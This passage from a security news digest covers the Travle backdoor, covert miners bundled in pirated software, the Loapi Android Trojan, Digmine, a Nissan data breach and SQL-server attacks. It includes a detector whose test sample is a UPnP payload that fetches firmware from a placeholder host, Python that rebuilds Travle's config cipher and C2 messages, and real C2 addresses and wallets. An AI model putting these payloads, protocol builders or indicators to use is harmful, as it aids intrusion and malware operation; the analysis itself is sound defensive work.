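    "<NewDownloadURL>http://192.0.2.20/fw.bin</NewDownloadURL>"
)
SAMPLE_FLOWS = [
    "10.0.0.5 51234 203.0.113.7 7645 TCP",   # constructed: bot checking in
    "10.0.0.6 51235 203.0.113.8 443 TCP",    # constructed: ordinary HTTPS
    "10.0.0.7 51236 203.0.113.9 7645 UDP",   # constructed: wrong protocol, not flagged
]

if __name__ == "__main__":
    print(inspect_upgrade_request(SAMPLE_MALICIOUS))
    print(inspect_upgrade_request(SAMPLE_BENIGN))
    print(flag_satori_c2_flows(SAMPLE_FLOWS))
```

The request check is narrow on purpose: it fires only for the DeviceUpgrade controlURL, so a gateway that already blocks port 37215 from the WAN (the advisory's firewall recommendation) would never even see it.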


Travle aka PYLOT backdoor hits Russian-speaking targets
22.12.2017 Kaspersky
Virus
At the end of September, Palo Alto released a report on Unit42 activity where they – among other things – talked about PYLOT malware. We have been detecting attacks that have employed the use of this backdoor since at least 2015 and refer to it as Travle. Coincidentally, KL was recently involved in an investigation of a successful attack where Travle was detected, during which we conducted a deep analysis of this malware. So, with this intelligence ready we are sharing our findings in this blog to supplement Palo Alto’s research with additional details.

Technical Details
MD5                               SIZE    LINKER  COMPILED ON
7643335D06BAEC5A14C95A393592EA3F  164352  11.0    2016-10-14 06:21:07
The Travle sample found during our investigation was a DLL with a single exported function (MSOProtect). The malware name Travle was chosen given a string found in early samples of this family: “Travle Path Failed!”. This typo was replaced with correct word “Travel” in newer releases. We believe that Travle could be a successor to the NetTraveler family.

First of all, we detected numerous malicious documents used in spear-phishing attacks, with file names suggesting Russian-speaking targets and with the executables maintained in encrypted form:

This encryption method has been well known for a long time: it was first used in exploit documents to conceal Enfal, then we discovered this backdoor, Travle. Later, documents with this encryption started carrying yet another APT family, Microcin. Travle C2 domains often overlap with those of Enfal. As for NetTraveler, at some point Enfal samples started using the same encryption method for the C2 URL as NetTraveler did:

Enfal sample with NetTraveler-like C2 string encryption

So, clearly these backdoors – Enfal, NetTraveler, Travle and Microcin – are all related to each other and are believed to have Chinese-speaking origins. And after finding the string “Travel path failed!” we believe that the Travle backdoor could be intended as a successor to the NetTraveler malware.

The malware starts by initializing the following variables:

%TEMP%\KB287640\ – local malware drop-zone
%TEMP%\KB887209\ – plugins storage
<malware install path>\~KB178495.DAT – configuration file path

Surprisingly, these paths remain the same in all samples of this family. If no configuration file is found, Travle reads the default settings from its resource “RAW_DATA“. Settings are maintained in an encrypted form. Here is the code for decryption (an in-place XOR chain that walks backwards, so each byte is XORed with the still-encrypted byte two positions before it):

for (i = size - 1; i > 1; --i)
    buf[i] ^= buf[i - 2];

The storage format for the configuration block is as follows:

Offset  Size   Value
0       0x81   C2 domain
0x102   0x81   C2 URL path
0x204   2      C2 port (not used)
0x206   0xB    not used
0x21C   0xB    Sample ID
0x232   0x401  Bot’s first RC4 key
0xA34   0x401  Bot’s second RC4 key
0x1238  2      not used
The described sample maintains the following configuration data:

Field        Value
C2 domain    remember123321.com
C2 URL path  /zzw/ash.py
Sample ID    MjdfS0584
1st RC4 key  mffAFe4bgaadbAzpoYRf
2nd RC4 key  mffAFe4bgaadbAzpoYRf
The Travle backdoor starts its communication with the C2 by sending gathered information about the target operating system in an HTTP POST request to a URL built using the C2 domain and the path specified in the settings. The information sent includes the following data:

UserID – based on the computer name and IP address
Computer name
Keyboard layout
OS version
IP addresses
MAC address
Once the C2 receives the first packet, it responds with a block of data containing the following information:

URL path for receiving commands
URL path for reporting on command execution results
URL path for downloading files from C2
URL path for uploading files to C2
C2 second RC4 key
C2 first RC4 key
C2 ID
After this packet has been received, Travle waits for additional commands from the server.

Communication encryption
The ciphering algorithm depends on the type of transmitted object. There are three possible variants:

Data:
  The data is Base64-encoded.
  The resulting string is appended to a header of 0x58 bytes.
  The resulting buffer is RC4-encrypted with the C2 first RC4 key.
  The resulting buffer is Base64-encoded.
List of strings:
  Each line is RC4-encrypted with the C2 second RC4 key.
  Each resulting buffer is Base64-encoded.
  All the Base64-encoded strings are merged into one string, delimited with "\r\n".
  The resulting string is appended to a header of 0x54 bytes.
  The resulting buffer is RC4-encrypted with the C2 first RC4 key.
  The resulting buffer is Base64-encoded.
File:
  The file is compressed with LZO.
  The resulting archive is RC4-encrypted with the C2 second RC4 key.
Messages format
The header for the transmitted data is as follows:

Offset (bytes)  Size (bytes)  Description
0               0x14          Random set of bytes
0x14            4             Data type / Command ordinal
0x18            4             NULL / Command ID
0x1C            4             Size of data
0x20            0x14          Sample ID
0x34            0x24          User ID
0x58            Size of data  Data
The file is transferred to the C2 in a POST request as a multipart content type with boundary “kdncia987231875123nnm“. All samples of Travle we have discovered use this value.
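The configuration XOR scheme and the 0x58-byte message header described above are simple enough to reproduce in full. The following is an added example, not Kaspersky's code: it implements the decryption loop quoted earlier together with its inverse, parses a configuration block using the offsets from the table, and packs and parses a message header with the layout just given. The configuration bytes are constructed from the documented field values; the header's integer fields are assumed to be little-endian, and the random 0x14 bytes and the user ID are assumed to be opaque.

```python
"""Added example: Travle configuration-block cipher, config parser and
message-header packer, built from the field layouts in the analysis."""
import os
import struct


def travle_decrypt(buf):
    """The backwards XOR chain quoted in the analysis: each byte is XORed with the
    still-encrypted byte two positions before it."""
    b = bytearray(buf)
    for i in range(len(b) - 1, 1, -1):
        b[i] ^= b[i - 2]
    return bytes(b)


def travle_encrypt(buf):
    """Inverse of travle_decrypt: walk forwards so each byte is XORed with the
    already-encrypted byte two positions before it."""
    b = bytearray(buf)
    for i in range(2, len(b)):
        b[i] ^= b[i - 2]
    return bytes(b)


# offset: (size, name), taken from the configuration-block table; unused fields omitted.
CONFIG_FIELDS = {
    0x000: (0x81, "c2_domain"),
    0x102: (0x81, "c2_url_path"),
    0x204: (2, "c2_port"),
    0x21C: (0xB, "sample_id"),
    0x232: (0x401, "rc4_key_1"),
    0xA34: (0x401, "rc4_key_2"),
}
CONFIG_SIZE = 0x1238 + 2   # last field (2 bytes) starts at 0x1238


def parse_config(plain):
    """Split a decrypted configuration block into its named fields."""
    cfg = {}
    for offset, (size, name) in CONFIG_FIELDS.items():
        raw = plain[offset:offset + size]
        if name == "c2_port":
            cfg[name] = struct.unpack("<H", raw)[0]   # little-endian assumed
        else:
            cfg[name] = raw.split(b"\0", 1)[0].decode("latin-1")
    return cfg


def build_config(domain, path, sample_id, key1, key2, port=0):
    """Constructed plaintext configuration block laid out per the table."""
    buf = bytearray(CONFIG_SIZE)
    for offset, data in ((0x000, domain.encode()), (0x102, path.encode()),
                         (0x204, struct.pack("<H", port)), (0x21C, sample_id.encode()),
                         (0x232, key1.encode()), (0xA34, key2.encode())):
        buf[offset:offset + len(data)] = data
    return bytes(buf)


# 0x14 random bytes, type/ordinal, NULL/command ID, data size, 0x14-byte sample ID, 0x24-byte user ID.
HEADER = struct.Struct("<20sIII20s36s")   # 0x58 bytes, little-endian assumed
assert HEADER.size == 0x58


def build_message(msg_type, cmd_id, data, sample_id, user_id):
    """Pack a bot-to-C2 message: header followed by the (already ciphered) data."""
    header = HEADER.pack(os.urandom(20), msg_type, cmd_id, len(data),
                         sample_id.encode(), user_id.encode())
    return header + data


def parse_message(blob):
    """Unpack a message built with build_message."""
    _random, msg_type, cmd_id, size, sid, uid = HEADER.unpack_from(blob)
    return {"type": msg_type, "id": cmd_id,
            "sample_id": sid.rstrip(b"\0").decode(), "user_id": uid.rstrip(b"\0").decode(),
            "data": blob[HEADER.size:HEADER.size + size]}


if __name__ == "__main__":
    # Round trip using the field values reported for the analysed sample.
    cfg = build_config("remember123321.com", "/zzw/ash.py", "MjdfS0584",
                       "mffAFe4bgaadbAzpoYRf", "mffAFe4bgaadbAzpoYRf")
    print(parse_config(travle_decrypt(travle_encrypt(cfg))))
    print(parse_message(build_message(1, 0, b"OS info (constructed)", "MjdfS0584", "user-1")))
```

Because the cipher is a plain XOR chain with no key, recovering a sample's configuration from its RAW_DATA resource needs nothing beyond this loop; that is also why the RC4 keys, not this scheme, carry the real protection of the C2 traffic.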

Message types – from bot to C2
The command ID is specified at offset 0x18 in the header.

Technical messages are as follows:

ID  Description                     Data content
1   Information about OS            Information about OS
2   Request for the first command   NULL
3   Request for the list of commands  NULL
4   Command is successfully executed  Information about command execution or the name of transmitted file
5   Command execution failed        Information about an error
Operational messages are as follows:

ID  Description                                              Data content
1   Bot sends the list of files in the requested directory   The list of files
11  Bot sends the content of the requested file              The content of the file
Message types – from C2 to bot
When the bot sends a POST request, the C2 responds with data in the following format:

ID  Description           Data content
0   Information about C2  The list of C2 parameters
1   Commands              The list of commands
The bot may also send a GET request to retrieve a specific file from the server. In this case, the C2 responds with the requested file.

General communication between bot and C2
Interaction with C2 includes two stages:

1st (automatic – carried out with no operator actions). It consists of:

Sending information about the OS
Receiving information about C2
Sending a request for the first command
Receiving the command with ordinal 1 and first argument “*”
Sending the request for the next command
2nd (carried out by operators). It consists of:

Sending commands to the bot
Sending files to the bot
Sending results of the executed commands to the C2
Commands – general bot functionality
Each command is listed with its ordinal, its arguments and the action it triggers.

1 – Scan File System
  Arguments: Path; Minimum date; Maximum date
  Action: If “Path” is not “*”, the bot collects the list of files and folders in the specified directory with a creation date between the specified values, plus files with an “Encrypted” attribute. If “Path” is “*”, the search for files and folders is done across the complete file system. In either case, the search is recursive.
2 – Run Process
  Arguments: Path to the batch or executable file; Command line arguments
  Action: The bot executes the specified batch file or application with the passed arguments.
4 – File Presence Test
  Arguments: File name
  Action: The bot checks whether the specified file exists.
3 – Delete File
  Arguments: File name
  Action: File deletion.
5 – Rename File
  Arguments: Old file name; New file name
  Action: File renaming.
6 – Move File
  Arguments: Old path; New path
  Action: File moving.
7 – Create New Config
  Arguments: Content of the new configuration
  Action: The bot creates the file with the new configuration.
48 – Process File With Batch
  Arguments: Batch script; File path
  Action: The bot sends a GET request to the C2 to download the file specified in one command argument. The batch script received in the other command argument is saved to a file and executed with the downloaded file’s name as its parameter.
49 – Run Batch
  Arguments: Batch script
  Action: The bot receives a BAT file and executes it.
16 – Download File
  Arguments: File path
  Action: The bot sends a GET request to download a file. The file is saved with the specified name and location.
17 – Upload File
  Arguments: File path
  Action: The bot sends the content of the requested file in a POST message.
32 – Download And Run Plugin
  Arguments: Plugin name; Plugin argument
  Action: The bot sends a GET request to download a plugin (DLL). The plugin is saved to the file system and launched with the LoadLibrary API function.
33 – Unload Plugin
  Arguments: Plugin name
  Action: The bot unloads a plugin library from memory.
34 – Delete Plugin
  Arguments: Plugin name
  Action: The bot unloads a plugin from memory and deletes the plugin file.
35 – Load And Run Plugin
  Arguments: Plugin name; Plugin argument
  Action: The bot loads a plugin into memory with the specified parameter.
Plugins
Unfortunately, we have been unable to retrieve plugins from any C2 found in the examined Travle samples, but after analyzing the code of Travle we can briefly describe how they are handled.

Plugins are handled with commands 32-35. Analysis of all the Travle samples showed that not every sample is able to work with plugins.

Each plugin DLL is saved in a file and loaded with the use of the LoadLibrary API function. The DLL should export three functions: GetPluginInfo, Starting and FreeMemory. These functions are invoked one-by-one at the plugin DLL loading stage. When Travle has to unload the plugin DLL it calls the FreeLibrary API function.

In all analyzed Travle samples, plugins are saved in the same location: %TEMP%\KB887209\.

Conclusion
The actor or actors responsible for the Travle attacks have been active for the last few years, apparently not worried about being tracked by AV companies. Usually, modifications and new additions to their arsenal are discovered and detected quite quickly. Still, the fact that they didn't really need to change their TTPs during all these years suggests that they don't need to increase their sophistication level in order to fulfill their goals. What's worse, according to the subjects of the decoy documents, these backdoors are used primarily in the CIS region against government organizations, military entities and companies engaged in high-tech research, which indicates that even high-profile targets still have a long way to go in implementing IT-security best practices that efficiently resist targeted attacks.

We detect Travle samples with the following verdicts:

Trojan.Win32.Tpyn.*
Trojan.Win32.TravNet.*
Trojan-Spy.Win32.TravNet.*
HEUR:Trojan.Win32.Generic
HEUR:Trojan.Win32.TravNet.gen
HEUR:Backdoor.Win32.NetTraveler.gen


Nhash: petty pranks with big finances
22.12.2017 Kaspersky Security
According to our data, cryptocurrency miners are rapidly gaining in popularity. In an earlier publication we noted that cybercriminals were making use of social engineering to install this sort of software on users’ computers. This time, we’d like to dwell more on how exactly the computers of gullible users start working for cybercriminals.

Beware freebies

We detected a number of similar websites with offers to download various types of free software. Some of them really were free applications (such as OpenOffice), while others attempted to entice users with “free” software packages of Adobe Premiere Pro, CorelDraw, PowerPoint, etc. From the victim’s point of view, the software was indeed free – it didn’t ask for activation keys and could be used immediately. Moreover, the cybercriminals used domain names resembling those of recognized legitimate products, such as thefinereader.ru, theopenoffice.ru, etc. There was one thing all these apps had in common – they were installed on the victim computer along with a custom-configured version of cryptocurrency mining software from the NiceHash project.



All sites followed the same design template, differing only in their product descriptions and download links

Mining coins at any price
Kaspersky Lab’s products detect the NiceHash miner with the verdict not-a-virus:RiskTool.Win64.BitCoinMiner.cgi; it is not malicious according to Kaspersky Lab’s classification. According to KSN data, around 200 files are detected with this verdict. We chose the file FineReader-12.0.101.382.exe for analysis. It was obtained from the website thefinereader.ru which is no longer available; at this website, it was presented as a “free full version” of ABBYY FineReader. It should be noted that this hacked version, minus the miner component, has long been available on the internet via Torrent file distribution systems:

The executable file contains the installation package Inno Setup; unpacking it will produce a number of folders containing the actual software and its resources, as well as an installation guide script. The installer’s root folder looks like this:

The {app} folder is of interest to us; it contains the software that is installed. This folder contains a ‘portable’ version of FineReader:

The lib folder contains some suspicious-looking files:

Among these files is the NiceHash miner that we mentioned above. There are also text files in this folder that contain the information required to initialize the miner – namely the wallet details and the mining pool’s address. This folder will be installed stealthily to the victim computer while FineReader is installing.

A shortcut will also be created in the autorun folder:

The shortcut reveals the path to the miner’s work directory on the C drive:

That leaves the tskmgr.exe and system.exe files of interest for analysis. Both files are BAT scripts compiled into PE files. Let’s look at the contents of system.exe after extracting the BAT script:

It ensures the wallet’s address is up to date and initializes the miner’s operation. It contacts the following addresses:

http://176.9.42.149/tmp1.txt
http://176.9.42.149/tmp3.txt?user=default&idurl=3
http://176.9.42.149/tmp2.txt?user=3id170927143302
After the third query, the following response is received:

This is a PowerShell script that assigns a unique ID to the infected computer and launches mining with the correct wallet details (in this specific case, the zcash cryptocurrency is mined). IDs are generated following a specific algorithm based on the mining start time. For example, the ID 4v09v2017v03v24v26 is made up of the date (14.09.2017) and time (03:24:26).

We have also identified other types of covert miners with a slightly different logic. Below is the same Inno Setup installation package, but if we take a look at its contents, we can see lots of shortcuts:

Let’s take a look inside:

This is a classic case: the shortcuts are scattered across the system and, when opened by the user, launch the miner. The package includes the TrayIt! utility, which hides the miner’s window from the user by minimizing it to the system tray. This miner doesn’t receive any data from the server; instead it operates using the wallet and pool details that were hardwired into it.

Finances
Among the mining pools used by cybercriminals, we detected some that provided statistics about the wallets and the number of miners. At the time of our analysis, total revenue from all wallets was nearly US$3400.

The t1WSaZQxqBLLtGMKsGT6t9WGHom8LcE8Ng5 wallet

The t1JA25kJrAaUw9xe6TzGiC8BU5pZRhgL4Ho wallet

The t1N7sapDRuYdqzKgPwet8L31Z9Aa96i7hy4 wallet

The 3MR6WuGkuPDqPZgibV6gi4DaC7qMabEFks wallet

Conclusion
This small piece of research once again demonstrates that no one should ignore protection measures and get lulled into a false sense of security, believing cybercriminals are only interested in financial organizations; practice shows that regular users are also targeted. The mining software that we analyzed, albeit incapable of inflicting any damage, can seriously impair your workstation’s performance by hijacking its resources and making it work for somebody else.

Indicators of Compromise
C&C
176.9.42.149



Jack of all trades
22.12.2017 Kaspersky Android
Nowadays, it’s all too easy to end up with malicious apps on your smartphone, even if you’re using the official Google Play app store. The situation gets even worse when you go somewhere other than the official store – fake applications, limited security checks, and so on. However, the spread of malware targeting Android OS is not limited to unofficial stores – advertising, SMS-spam campaigns and other techniques are also used. Among this array of threats we found a rather interesting sample – Trojan.AndroidOS.Loapi. This Trojan boasts a complicated modular architecture that means it can conduct a variety of malicious activities: mine cryptocurrencies, annoy users with constant ads, launch DDoS attacks from the affected device and much more. We’ve never seen such a ‘jack of all trades’ before.

Distribution and infection
Samples of the Loapi family are distributed via advertising campaigns. Malicious files are downloaded after the user is redirected to the attackers’ malicious web resource. We found more than 20 such resources, whose domains refer to popular antivirus solutions and even a famous porn site. As we can see from the image below, Loapi mainly hides behind the mask of antivirus solutions or adult content apps:

After the installation process is finished, the application tries to obtain device administrator permissions, asking for them in a loop until the user agrees. Trojan.AndroidOS.Loapi also checks if the device is rooted, but never subsequently uses root privileges – no doubt they will be used in some new module in the future.

After acquiring admin privileges, the malicious app either hides its icon in the menu or simulates various antivirus activity, depending on the type of application it masquerades as:

Self-protection
Loapi aggressively fights any attempts to revoke device manager permissions. If the user tries to take away these permissions, the malicious app locks the screen and closes the window with device manager settings, executing the following code:

As well as this fairly standard technique to prevent removal, we also found an interesting feature in the self-protection mechanism. The Trojan is capable of receiving from its C&C server a list of apps that pose a danger. This list is used to monitor the installation and launch of those dangerous apps. If one of the apps is installed or launched, then the Trojan shows a fake message claiming it has detected some malware and, of course, prompts the user to delete it:

This message is shown in a loop, so even if the user rejects the offer, the message will be shown again and again until the user finally agrees and deletes the application.

Layered architecture

Let’s take a look at the Trojan’s architecture in more detail:

At the initial stage, the malicious app loads a file from the “assets” folder, decodes it using Base64 and afterwards decrypts it using XOR operations and the app signature hash as a key. A DEX file with payload, which was retrieved after these operations, is loaded with ClassLoader.
At the second stage, the malicious app sends JSON with information about the device to the central C&C server hxxps://api-profit.com:

A command in the following format is received as a response from the server:

Where “installs” is a list of module IDs that have to be downloaded and launched; “removes” is a list of module IDs that have to be deleted; “domains” is a list of domains to be used as C&C servers; “reservedDomains” is an additional reserved list of domains; “hic” is a flag that shows that the app icon should be hidden from the user; and “dangerousPackages” is a list of apps that must be prevented from launching and installing for self-protection purposes.

At the third stage, the modules are downloaded and initialized. All the malicious functionality is concealed inside them. Let’s take a closer look at the modules we received from the cybercriminals’ server.
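As an added example, not code from the Kaspersky write-up or from the Trojan itself, here is a Python sketch of how an analyst could reverse the stage-1 asset and triage a stage-2 command: the cyclic XOR layout, the value types of the JSON fields and every sample value (key, payload, domains, package name) are constructed assumptions.

```python
import base64
import binascii
import hashlib
import json

DEX_MAGIC = b"dex\n035\0"  # header magic of a classes.dex file (format version 035)


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. The write-up says the key is the app signature hash but
    not how it is applied, so the cyclic layout here is an assumption."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def unpack_stage1(asset_blob: bytes, signature_hash: bytes) -> bytes:
    """Undo stage 1: Base64-decode the asset, XOR it with the signature hash and
    check that a DEX header comes out, so a wrong key fails loudly."""
    dex = xor_with_key(base64.b64decode(asset_blob), signature_hash)
    if not dex.startswith(DEX_MAGIC):
        raise ValueError("decoded payload is not a DEX file (wrong key or wrong asset)")
    return dex


def is_stage1_asset(asset_blob: bytes, signature_hash: bytes) -> bool:
    """True if the blob decodes to a DEX file under the given key."""
    try:
        unpack_stage1(asset_blob, signature_hash)
        return True
    except (ValueError, binascii.Error):
        return False


def parse_command(raw_json: str) -> dict:
    """Normalise a stage-2 C&C response (field names as described in the write-up;
    the value types are assumed) into an analyst-friendly summary."""
    cmd = json.loads(raw_json)
    return {
        "install": [str(x) for x in cmd.get("installs", [])],
        "remove": [str(x) for x in cmd.get("removes", [])],
        "c2_domains": list(cmd.get("domains", [])),
        "reserved_c2_domains": list(cmd.get("reservedDomains", [])),
        "hide_icon": bool(cmd.get("hic", 0)),  # assumed to be a truthy flag
        "dangerous_packages": list(cmd.get("dangerousPackages", [])),
    }


def blocklist_from_command(raw_json: str) -> set:
    """Every C&C hostname worth blocking: the primary list plus the reserve list."""
    c = parse_command(raw_json)
    return set(c["c2_domains"]) | set(c["reserved_c2_domains"])


# --- Constructed sample data; none of it comes from a real Loapi sample ---
SIGNATURE_HASH = hashlib.sha1(b"constructed-apk-signature").digest()
FAKE_DEX = DEX_MAGIC + bytes(range(64))           # stand-in for a payload DEX
CONSTRUCTED_ASSET = base64.b64encode(xor_with_key(FAKE_DEX, SIGNATURE_HASH))

CONSTRUCTED_COMMAND = json.dumps({
    "installs": [1, 3],
    "removes": [2],
    "domains": ["c2-primary.example.invalid"],
    "reservedDomains": ["c2-backup.example.invalid"],
    "hic": 1,
    "dangerousPackages": ["com.example.mobileav"],
})

if __name__ == "__main__":
    dex = unpack_stage1(CONSTRUCTED_ASSET, SIGNATURE_HASH)
    print(f"recovered {len(dex)} byte DEX, magic ok")
    print(parse_command(CONSTRUCTED_COMMAND))
    print("block:", sorted(blocklist_from_command(CONSTRUCTED_COMMAND)))
```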
Advertisement module

Purpose and functionality: this module is used for the aggressive display of advertisements on the user’s device. It can also be used for secretly boosting ratings. Functionality:

Display video ads and banners
Open specified URL
Create shortcuts on the device
Show notifications
Open pages in popular social networks, including Facebook, Instagram, VK
Download and install other applications
An example of an ad-display task received from the server:

While handling this task, the application sends a hidden request with a specific User-Agent and Referrer to the web page hxxps://ronesio.xyz/advert/api/interim, which in turn redirects to a page with the ads.

SMS module
Purpose and functionality: this module performs various manipulations with text messages. It periodically sends requests to the C&C server to obtain the relevant settings and commands. Functionality:

Send inbox SMS messages to attackers’ server
Reply to incoming messages according to specified masks (masks are received from C&C server)
Send SMS messages with specified text to specified number (all information is received from C&C server)
Delete SMS messages from inbox and sent folder according to specified masks (masks are received from C&C server)
Execute requests to URL and run specified Javascript code in the page received as a response (legacy functionality that was later moved to a separate module)
Web crawling module
Purpose and functionality: this module is used for hidden Javascript code execution on web pages with WAP billing in order to subscribe the user to various services. Sometimes mobile operators send a text message asking for confirmation of a subscription. In such cases the Trojan uses SMS module functionality to send a reply with the required text. Also, this module can be used for web page crawling. An example of a web page crawling task received from the server is shown below:

This module together with the advertisement module tried to open about 28,000 unique URLs on one device during our 24-hour experiment.

Proxy module
Purpose and functionality: this module is an implementation of an HTTP proxy server that allows the attackers to send HTTP requests from the victim’s device. This can be used to organize DDoS attacks against specified resources. This module can also change the internet connection type on a device (from mobile traffic to Wi-Fi and vice versa).

Mining Monero
Purpose and functionality: this module uses the Android version of minerd to perform Monero (XMR) cryptocurrency mining. Mining is initiated using the code below:

The code uses the following arguments:

url – mining pool address, “stratum+tcp://xmr.pool.minergate.com:45560”
this.user – username, value randomly selected from the following list: “lukasjeromemi@gmail.com”, “jjopajopaa@gmail.com”, “grishaobskyy@mail.ru”, “kimzheng@yandex.ru”, “hirt.brown@gmx.de”, “swiftjobs@rambler.ru”, “highboot1@mail333.com”, “jahram.abdi@yandex.com”, “goodearglen@inbox.ru”, “girlfool@bk.ru”
password – constant value, “qwe”
Old ties
During our investigation we found a potential connection between Loapi and Trojan.AndroidOS.Podec. We gathered some evidence to support this theory:

Matching C&C server IP addresses. The address of the active Loapi C&C server currently resolves via DNS to 5.101.40.6 and 5.101.40.7. But if we look at the history, we can see other IP addresses to which this URL resolved before:

At first, this URL was resolved to the IP address 91.202.62.38. If we analyze the history of DNS records that resolved to this address, we see the following:

As we can see from the records, in 2015 (when Podec was active), this IP address was resolved from various generated domains, and many of them were used in Podec (for example, obiparujudyritow.biz, in the 0AF37F5F07BBF85AFC9D3502C45B81F2 sample).

Matching unique fields at the initial information collection stage. Both Trojans collect information with similar structure and content and send it in JSON format to the attackers’ server during the initial stage. Both JSON objects have the fields “Param1”, “Param2” and “PseudoId”. We performed a search in our internal ElasticSearch clusters – where we store information about clean and malicious applications – and found these fields were only used in Podec and Loapi.
Similar obfuscation.
Similar ways of detecting SU on a device.
Similar functionality (both can subscribe users to paid services).
None of these arguments can be considered conclusive proof of our theory, but taken together they suggest there’s a high probability that the malicious applications Podec and Loapi were created by the same group of cybercriminals.

Conclusion
Loapi is an interesting representative from the world of malicious Android apps. Its creators have implemented almost the entire spectrum of techniques for attacking devices: the Trojan can subscribe users to paid services, send SMS messages to any number, generate traffic and make money from showing advertisements, use the computing power of a device to mine cryptocurrencies, as well as perform a variety of actions on the internet on behalf of the user/device. The only thing missing is user espionage, but the modular architecture of this Trojan means it’s possible to add this sort of functionality at any time.

P.S.
As part of our dynamic malware analysis we installed the malicious application on a test device. The images below show what happened to it after two days:

Because of the constant load caused by the mining module and generated traffic, the battery bulged and deformed the phone cover.

C&C
ronesio.xyz (advertisement module)
api-profit.com:5210 (SMS module and mining module)
mnfioew.info (web crawler)
mp-app.info (proxy module)

Domains
List of web resources from which the malicious application was downloaded:



Beware of Cryptocurrency Mining Virus Spreading Through Facebook Messenger
22.12.2017 thehackernews
Social

If you receive a video file (packed in a zip archive) sent by someone, even one of your friends, via Facebook Messenger, just don’t click on it.
Researchers from security firm Trend Micro are warning users of a new cryptocurrency mining bot which is spreading through Facebook Messenger and targeting Google Chrome desktop users to take advantage of the recent surge in cryptocurrency prices.
Dubbed Digmine, the Monero-mining bot disguises itself as a non-embedded video file under the name video_xxxx.zip (as shown in the screenshot), but actually contains an AutoIt executable script.
Once clicked, the malware infects victim’s computer and downloads its components and related configuration files from a remote command-and-control (C&C) server.
Digmine primarily installs a cryptocurrency miner, i.e. miner.exe, a modified version of an open-source Monero miner known as XMRig, which silently mines the Monero cryptocurrency in the background for the attackers using the CPU power of the infected computers.

Besides the cryptocurrency miner, the Digmine bot also installs an autostart mechanism and launches Chrome with a malicious extension that allows attackers to access the victims’ Facebook profile and spread the same malware file to their friends list via Messenger.
Since Chrome extensions can only be installed via official Chrome Web Store, "the attackers bypassed this by launching Chrome (loaded with the malicious extension) via command line."
"The extension will read its own configuration from the C&C server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video" Trend Micro researchers say.
"The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware’s components."
It's noteworthy that users opening the malicious video file through the Messenger app on their mobile devices are not affected.
Since the miner is controlled from a C&C server, the authors behind Digmine can upgrade their malware to add different functionalities overnight.
Digmine was first spotted infecting users in South Korea and has since spread its activities to Vietnam, Azerbaijan, Ukraine, Philippines, Thailand, and Venezuela. But since Facebook Messenger is used worldwide, there are more chances of the bot being spread globally.
When notified by the researchers, Facebook said it had taken down most of the malware files from the social networking site.
Facebook spam campaigns are quite common, so users are advised to be vigilant when clicking on links and files provided via the social media platform.


Nissan Finance Canada Suffers Data Breach — Notifies 1.13 Million Customers
22.12.2017 thehackernews Incident

It's the last month of this year, but possibly not the last data breach report.
Nissan warns of a possible data breach of personal information on its customers who financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada.
Although the company says it does not know precisely how many customers were affected by the data breach, Nissan is contacting all of its roughly 1.13 million current and previous customers.
In a statement released Thursday, Nissan Canada said the company became aware of an "unauthorized access to personal information" of some customers on December 11.
"Nissan Canada Finance recently became aware it was the victim of a data breach that may have involved an unauthorized person(s) gaining access to the personal information of some customers that have financed their vehicles through Nissan Canada Finance and INFINITI Financial Services Canada," the company said.
It's believed that the unknown hacker(s) may have had access to the following information:
Customers' names
Home addresses
Vehicle makes and models
Vehicle identification numbers (VIN)
Credit scores
Loan amounts
Monthly payments
The company says there is no indication, at least at the moment, that the data breach also includes payment information or contact information such as email addresses or phone numbers.
The company offers 12 months of free credit monitoring services through TransUnion to all of its financed customers.
Since the investigation into the data breach incident is still ongoing, it is not clear if the hack also impacts customers outside of Canada and customers who did not obtain financing through NCF.
"We sincerely apologize to the customers whose personal information may have been illegally accessed and for any frustration or inconvenience that this may cause," Nissan Canada president Alain Ballu said. "We are focused on supporting our customers and ensuring the security of our systems."
Nissan Canada has contacted Canadian privacy regulators, law enforcement, and data security experts to help rapidly investigate the matter.


Chinese Hackers Target Servers With Three Types of Malware
22.12.2017 securityweek BigBrothers
An established Chinese crime group uses a large coordinated infrastructure to target servers running database services with three different types of malware, GuardiCore security researchers say.

The group is operating worldwide and has been observed launching multiple attacks over the past several months. Each of the three malware families employed – Hex, Hanako and Taylor – is targeting different SQL servers and has its own goals, scale and target services.

According to GuardiCore, a campaign that began by targeting a single server in March of this year evolved into thousands of attacks per day during the summer, hitting numerous MS SQL Server and MySQL services. The compromised machines were used for various activities, including cryptocurrency mining, distributed denial of service (DDoS), and implanting Remote Access Trojans (RATs).

While most of the compromised machines are located in China, some were observed in Thailand, the U.S., Japan, and other countries. Database services on both Windows and Linux machines are targeted.

The three campaigns launched from this infrastructure differ mostly in target goals: Hex focuses on cryptocurrency miners and RATs; Hanako builds a DDoS botnet; and Taylor installs a keylogger and a backdoor. To date, the security firm has observed hundreds of Hex and Hanako attacks and tens of thousands of Taylor incidents each month.

“From what we’ve seen, the attackers often compromise public and private cloud deployments without chasing any specific domain. This is shown in their frequent scanning of Azure and AWS public IP ranges (which are publicly available) while looking for potential victims,” GuardiCore says.

Compromised machines aren’t used for long

To fly under the radar, the actors use each machine to attack only a small number of IPs. The security researchers discovered that victims are re-purposed to make tracing as difficult as possible: every compromised machine is used for about a month and then rotated out of use.

The infected systems are used for scanning, launching attacks, hosting malware executables and as command and control (C&C) servers. Most of the attacks feature three simple steps: scanning, attacking and initial implant.

The scan machines search for subnets and create ‘hit lists’ of IPs and credentials. The attackers, the researchers say, start from a large set of IP ranges and look for machines running services such as HTTP web servers, MS SQL Server, ElasticSearch, and more.

Based on these ‘hit lists’, the attacker machines attempt to gain an initial foothold on the servers by brute forcing MS SQL and MySQL databases. Next, they execute predefined SQL commands to gain full control of the victim machine, such as creating new users for persistence.

Parts of the campaign, such as the RATs, are hosted on separate file servers, to ensure attacks aren’t dependent on a single server. In addition to this modular approach, the infrastructure features both FTP and HFS (HTTP File Server) servers and is used to deliver additional attack tools after the initial dropper runs.

While the Taylor attacks were observed downloading the files from two domains, down@mys2016@info and js@mys2016@info, both registered in March 2017, Hex and Hanako were observed using a unique file server per attack.

Attack flow

After brute forcing their way onto the target servers (an operation possible because many admins don’t harden the database beyond the use of a password), the attackers use xp_cmdshell, a variety of stored procedures and OLE automation to upload their first set of tools.

